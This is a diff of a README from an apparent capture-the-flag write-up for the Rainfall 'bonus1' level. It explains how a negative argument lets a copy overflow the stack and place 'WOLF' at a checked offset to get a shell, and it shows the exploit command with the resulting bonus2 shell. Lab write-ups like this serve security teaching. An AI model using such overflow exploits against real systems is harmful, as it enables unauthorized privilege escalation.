Skalyaeve/Rainfall/Bonus/Bonus 1/README.md

 > Subsequently, if the value at `0x3c(%esp)` is equal to 0x574f4c46 ("WOLF"), open a shell.

-- So, by providing a negative number as first argument, it allows us to write enough into memory to place 'WOLF' (backwards) at 0x3c(%esp):
+- So, by providing a negative number as first argument, it allows us to write enough into memory to place 'WOLF' (backwards) at `0x3c(%esp)`:
 ```
-bonus1@RainFall:~$ ./bonus1 -1073741800 ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNFLOW
+bonus1@RainFall:~$ ./bonus1 -1073741800 abcdefghijklmnopqrstuvwxyzabcdefghijklmnFLOW

 $ whoami
 bonus2